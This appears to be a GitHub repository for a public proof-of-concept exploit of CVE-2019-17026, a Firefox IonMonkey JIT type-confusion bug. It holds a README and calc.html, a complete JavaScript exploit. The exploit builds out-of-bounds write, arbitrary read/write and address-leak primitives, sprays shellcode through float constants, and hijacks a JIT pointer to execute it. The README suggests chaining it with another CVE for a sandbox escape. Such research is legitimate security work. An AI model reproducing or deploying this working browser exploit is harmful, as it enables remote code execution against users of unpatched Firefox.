├── README.md
└── calc.html


/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2019-17026 - A Firefox JIT bug
 2 | 
 3 | - Original bug caught in the wild by [Qihoo 360](https://blogs.360.cn/post/apt-c-06_0day.html).
 4 | - Exploit written by [maxpl0it](https://twitter.com/maxpl0it).
 5 | - Works on Firefox < 72.0.1
 6 | 
 7 | This is an exploit for CVE-2190-17026:
 8 | *IonMonkey type confusion with StoreElementHole and FallibleStoreElement*
 9 | 
10 | This exploit does not use a sandbox escape, so for testing the *security.sandbox.content.level* attribute in *about:config* needs to be set to 0. It should be possible to chain this with [CVE-2020-0674](https://github.com/maxpl0it/CVE-2020-0674-Exploit) via [PAC](https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html) to get a sandbox escape on Windows.
11 | 
12 | The writeup for this vulnerability and the steps taken to exploit it can be found [here.](https://labs.f-secure.com/blog/exploiting-cve-2019-17026-a-firefox-jit-bug/)
13 | 
14 | 


--------------------------------------------------------------------------------
/calc.html:
--------------------------------------------------------------------------------
  1 | <html>
  2 | <head>
  3 | </head>
  4 | <body>
  5 | <script>
  6 | 
  7 | /*
  8 | Vulnerability: CVE-2019-17026
  9 | Found by: Qihoo 360 in the wild
 10 | 
 11 | Exploit by: maxpl0it (@maxpl0it)
 12 | 
 13 | No sandbox escape, but feel free to take a crack at it by chaining with CVE-2020-0674 (https://github.com/maxpl0it/CVE-2020-0674-Exploit)
 14 | 
 15 | Writeup: https://labs.f-secure.com/blog/exploiting-cve-2019-17026-a-firefox-jit-bug/
 16 | 
 17 | */
 18 | 
 19 | // Helpers
 20 | conv = new ArrayBuffer(8);
 21 | dbl = new Float64Array(conv);
 22 | num = new Uint32Array(conv);
 23 | 
 24 | 
 25 | // Setup
 26 | oob_arr = [1.1, 1.2, , 1.4]; // This is used to trigger the side effect. It's not in the above diagram
 27 | victim = new Array(0x20); // This array will have its length set to zero so it can write over the capacity/length values of setter_arr
 28 | setter_arr = new Array(0x20); // This array will be used to read and set pointers reliably and repeatably in rw_arr
 29 | rw_arr = new Array(0x20); // Used for arbitrary reads and writes
 30 | 
 31 | // Side effects
 32 | oob_arr.__defineSetter__("-1", function(x) {
 33 | 	console.log("[+] Side Effects reached");
 34 | 	victim.length = 0;
 35 | 	setter_arr.length = 0;
 36 | 	rw_arr.length = 0;
 37 | 	gc();
 38 | });
 39 | 
 40 | // Call the GC - Phoenhex function
 41 | function gc() {
 42 | 	maxMallocBytes=128*1024*1024; // 128m
 43 | 	for (var i =0; i <3; i++) {
 44 | 		var x = new ArrayBuffer(maxMallocBytes); // Allocate locally, but don't save
 45 | 	}
 46 | }
 47 | 
 48 | // Exploit
 49 | function jitme(index, in2, in3) {
 50 | 	// Removes future bounds checks with GVN
 51 | 	victim[in2] = 4.2;
 52 | 	victim[in2 - 1] = 4.2;
 53 | 
 54 | 	// Triggers the side-effect function
 55 | 	oob_arr[index] = 2.2;
 56 | 
 57 | 	// Write out-of-bounds
 58 | 	victim[in2] = in3; // capacity and length
 59 | 	victim[in2 - 1] = 2.673714696616e-312; // initLength and flags
 60 | }
 61 | 
 62 | // JIT the exploit
 63 | for(i=0;i<0x10000;i++) {
 64 | 	oob_arr.length = 4; // Reset the length so that StoreElementHole node is used
 65 | 	jitme(5, 11, 2.67371469724e-312);
 66 | }
 67 | 
 68 | oob_arr.length = 4; // Reset the length one more time
 69 | jitme(-1, 11, 2.67371469724e-312); // Call the jitted function with the side-effect index (-1)
 70 | 
 71 | 
 72 | 
 73 | // Create properties that we can use for weak reads
 74 | rw_arr.x = 5.40900888e-315; // Most significant bits are 0 - no tag, allows an offset of 4 to be treated as a double
 75 | rw_arr.y = 0x41414141;
 76 | rw_arr.z = 0; // Least significant bits are 0 - offset of 4 means that y will be treated as a double
 77 | 
 78 | 
 79 | 
 80 | // Can only handle normal pointers, not tagged pointers
 81 | //    1. Backup property pointer
 82 | //    2. Set property pointer to target address
 83 | //    3. Read value at address with property x
 84 | //    4. Restore the original property pointer
 85 | function weak_read(dbl_addr) {
 86 | 	original = setter_arr[8];
 87 | 	setter_arr[8] = dbl_addr; // properties pointer - change the pointer of x
 88 | 	result = rw_arr.x;
 89 | 	setter_arr[8] = original;
 90 | 	return result;
 91 | }
 92 | 
 93 | 
 94 | 
 95 | // Can only handle normal pointers, not tagged pointers
 96 | //    1. Backup property pointer
 97 | //    2. Set property pointer to target address
 98 | //    3. Set value at address with property x
 99 | //    4. Restore the original property pointer
100 | function weak_write(dbl_addr, dbl_val) {
101 | 	original = setter_arr[8];
102 | 	setter_arr[8] = dbl_addr;
103 | 	rw_arr.x = dbl_val;
104 | 	setter_arr[8] = original;
105 | }
106 | 
107 | 
108 | 
109 | // Erases the tag and reads the address as a double
110 | //    1. Backup property pointer
111 | //    2. Sets property y to the object
112 | //    3. Calculate new property offset
113 | //    4. Read lower bits as double
114 | //    5. Read upper bits as double
115 | //    6. Remove the tag
116 | //    7. Restore the original property pointer
117 | function weak_addrof(o) {
118 | 	original = setter_arr[8]; // 1
119 | 	rw_arr.y = o; // 2
120 | 
121 | 	// 3
122 | 	dbl[0] = setter_arr[8];
123 | 	num[0] = num[0] + 4;
124 | 	setter_arr[8] = dbl[0];
125 | 
126 | 	// 4
127 | 	dbl[0] = rw_arr.x;
128 | 	lower = num[1];
129 | 
130 | 	// 5
131 | 	dbl[0] = rw_arr.y; // Works in release, not in debug (assertion issues)
132 | 
133 | 	// 6
134 | 	upper = num[0] & 0x00007fff;
135 | 
136 | 	// 7
137 | 	setter_arr[8] = original;
138 | 
139 | 	// Convert to a float and return
140 | 	num[0] = lower;
141 | 	num[1] = upper;
142 | 	return dbl[0];
143 | }
144 | 
145 | 
146 | // Use constants to JIT spray shellcode
147 | function shellcode(){
148 | 	find_me = 5.40900888e-315; // 0x41414141 in memory
149 | 	A = -6.828527034422786e-229;
150 | 	B = 8.568532312320605e+170;
151 | 	C = 1.4813365150669252e+248;
152 | 	D = -6.032447120847604e-264;
153 | 	E = -6.0391189260385385e-264;
154 | 	F = 1.0842822352493598e-25;
155 | 	G = 9.241363425014362e+44;
156 | 	H = 2.2104256869204514e+40;
157 | 	I = 2.4929675059396527e+40;
158 | 	J = 3.2459699498717e-310;
159 | 	K = 1.637926e-318;
160 | }
161 | 
162 | target_buf = new Float64Array(1); // Used for the strong read
163 | data_ptr = null; // Save the pointer to the data pointer so we don't have to recalculate it each read
164 | 
165 | 
166 | // Saves the pointer to the data pointer so it doesn't have to be recalculated
167 | function setup_strong_read() {
168 | 	arr_addr = weak_addrof(target_buf);
169 | 	dbl[0] = arr_addr;
170 | 	num[0] = num[0] + 56; // float64array data pointer
171 | 	data_ptr = dbl[0];
172 | }
173 | 
174 | // The strong read
175 | //    1. Write the target address to the data pointer
176 | //    2. Read the first double from the location
177 | function read(dbl_addr) {
178 | 	weak_write(data_ptr, dbl_addr);
179 | 	return target_buf[0];
180 | }
181 | 
182 | 
183 | // Searches from the JIT location to find 0x41414141
184 | function find_shellcode_addr(addr) {
185 | 	dbl[0] = addr;
186 | 	for(i=0;i<100;i++) { // Only search 100 qwords
187 | 		val = read(dbl[0]); // Strong read primitive
188 | 		if(val == 5.40900888e-315) {
189 | 			console.log("[+] Shellcode offset at 0x" + num[1].toString(16) + num[0].toString(16));
190 | 			num[0] = num[0] + 8; // Past the find_me value
191 | 			return dbl[0];
192 | 		}
193 | 		num[0] = num[0] + 8;
194 | 	}
195 | }
196 | 
197 | 
198 | // Runs the exploit
199 | function exploit() {
200 | 	// Compile shellcode
201 | 	for(i=0;i<0x1000;i++) shellcode();
202 | 
203 | 	// Get Shellcode address
204 | 	shellcode_func = weak_addrof(shellcode);
205 | 
206 | 	// Get JSJitInfo structure
207 | 	dbl[0] = shellcode_func;
208 | 	num[0] = num[0] + 0x30; // JSFunction.u.native.extra.jitInfo_
209 | 	jitinfo = weak_read(dbl[0]);
210 | 
211 | 	// Get JIT compiled location
212 | 	jit_addr = weak_read(jitinfo);
213 | 	dbl[0] = jit_addr;
214 | 	if(num[0] == 0x41414141) {
215 | 		window.location.reload();
216 | 	}
217 | 	console.log("[+] JIT is at 0x" + num[1].toString(16) + num[0].toString(16));
218 | 
219 | 	// Get strong read primitive
220 | 	setup_strong_read();
221 | 
222 | 	// For this we need the strong read primitive since values here can start with 0xffff and thus act as tags
223 | 	shellcode_addr = find_shellcode_addr(jit_addr);
224 | 
225 | 	// Write the new JIT function address
226 | 	weak_write(jitinfo, shellcode_addr);
227 | 
228 | 	// Trigger code exec
229 | 	shellcode();
230 | }
231 | 
232 | exploit()
233 | </script>
234 | </body>
235 | </html>
236 | 


--------------------------------------------------------------------------------